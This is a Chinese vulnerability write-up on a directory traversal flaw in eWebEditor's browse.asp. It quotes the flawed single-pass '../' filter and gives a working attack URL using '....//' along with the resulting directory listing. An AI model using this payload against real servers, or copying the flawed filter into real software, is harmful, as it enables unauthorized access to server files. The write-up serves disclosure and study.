asp/browse.asp部分源码:

复制代码代码如下:

Dim s_ReturnFlag, s_FolderType, s_Dir

Dim s_CurrDir

s_ReturnFlag = Trim(Request.QueryString("returnflag"))

s_FolderType = Trim(Request.QueryString("foldertype"))

s_Dir = Trim(Request("dir"))

Select Case s_FolderType

Case "upload"

s_CurrDir = sUploadDir

Case "shareimage"

sAllowExt = ""

s_CurrDir = sPathShareImage

Case "shareflash"

sAllowExt = ""

s_CurrDir = sPathShareFlash

Case "sharemedia"

sAllowExt = ""

s_CurrDir = sPathShareMedia

Case Else

s_FolderType = "shareother"

sAllowExt = ""

s_CurrDir = sPathShareOther

End Select

s_Dir = Replace(s_Dir, "", "/")

'下面两行是对目录跳转的处理,漏洞存在于此处

s_Dir = Replace(s_Dir, "../", "") '替换../为空

s_Dir = Replace(s_Dir, "./", "") '替换./为空

If Left(s_Dir,1)="/" Then

s_Dir = ""

End If

Dim s_Dir2

s_Dir2 = Replace(s_Dir, "/", "")

If s_Dir <> "" Then

If CheckValidDir(s_CurrDir & s_Dir2) = True Then

s_CurrDir = s_CurrDir & s_Dir2

Else

s_Dir = ""

End If

End If

代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用....//代替上级目录,程序替换后....//变成../

攻击代码示例:

http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload

跳转到上eWebEditor的DiaLog目录,查看返回页面的源文件:

复制代码代码如下:

<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=gb2312'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>var arr = new Array();

arr[0]=new Array("about.htm", "1.85 KB","2009-05-29 16:27:06");

arr[1]=new Array("anchor.htm", "3.68 KB","2009-05-13 16:39:40");

arr[2]=new Array("art.htm", "49.55 KB","2009-05-13 16:39:40");

arr[3]=new Array("backimage.htm", "9.46 KB","2009-05-13 16:39:42");

arr[4]=new Array("browse.htm", "20.74 KB","2009-05-13 16:39:42");

arr[5]=new Array("dialog.js", "6.44 KB","2009-05-13 22:39:08");

arr[6]=new Array("emot.htm", "3.26 KB","2009-05-13 16:39:42");

arr[7]=new Array("EQ.htm", "3.48 KB","2009-05-14 00:02:20");

arr[8]=new Array("eWebEditorActiveX.CAB", "1118.08 KB","2009-05-14 00:18:40");

arr[9]=new Array("eWebEditorActiveXInstall.exe", "1190.72 KB","2009-04-11 23:12:48");

arr[10]=new Array("fieldset.htm", "4.11 KB","2009-05-13 16:39:42");

arr[11]=new Array("file.htm", "5.52 KB","2009-05-13 16:39:42");

arr[12]=new Array("findreplace.htm", "2.82 KB","2009-05-13 16:39:42");

arr[13]=new Array("flash.htm", "14.43 KB","2009-05-13 16:39:42");

arr[14]=new Array("fullscreen.htm", "0.84 KB","2009-05-13 16:39:42");

arr[15]=new Array("hyperlink.htm", "4.43 KB","2009-05-13 16:39:42");

arr[16]=new Array("iFrame.htm", "4.24 KB","2009-05-14 00:31:30");

arr[17]=new Array("img.htm", "13.25 KB","2009-05-13 16:39:42");

arr[18]=new Array("importexcel.htm", "5.87 KB","2009-05-13 16:39:42");

arr[19]=new Array("importword.htm", "8.44 KB","2009-05-13 16:39:42");

arr[20]=new Array("installactivex.htm", "2.02 KB","2009-05-13 16:39:42");

arr[21]=new Array("i_upload.htm", "7.95 KB","2009-05-13 22:41:40");

arr[22]=new Array("map.htm", "4.13 KB","2009-05-13 16:39:42");

arr[23]=new Array("marquee.htm", "2.44 KB","2009-05-13 16:39:42");

arr[24]=new Array("media.htm", "5.07 KB","2009-05-13 16:39:42");

arr[25]=new Array("owcexcel.htm", "2.64 KB","2009-05-13 16:39:42");

arr[26]=new Array("paragraph.htm", "5.95 KB","2009-05-13 16:39:42");

arr[27]=new Array("paste.htm", "4.50 KB","2009-05-13 16:39:42");

arr[28]=new Array("quickformat.htm", "13.58 KB","2009-05-13 16:39:42");

arr[29]=new Array("selcolor.htm", "14.93 KB","2009-05-13 16:39:42");

arr[30]=new Array("symbol.htm", "14.61 KB","2009-05-13 16:39:42");

arr[31]=new Array("table.htm", "11.71 KB","2009-05-13 16:39:42");

arr[32]=new Array("tablecell.htm", "7.98 KB","2009-05-13 16:39:42");

arr[33]=new Array("tablecellsplit.htm", "2.55 KB","2009-05-13 16:39:42");

arr[34]=new Array("template.htm", "4.50 KB","2009-05-13 16:39:42");

arr[35]=new Array("WebEQInstall.cab", "1123.39 KB","2009-05-14 00:16:16");

parent.setFileList('span_upload', 'upload', '../DiaLog', arr);</script></body></html>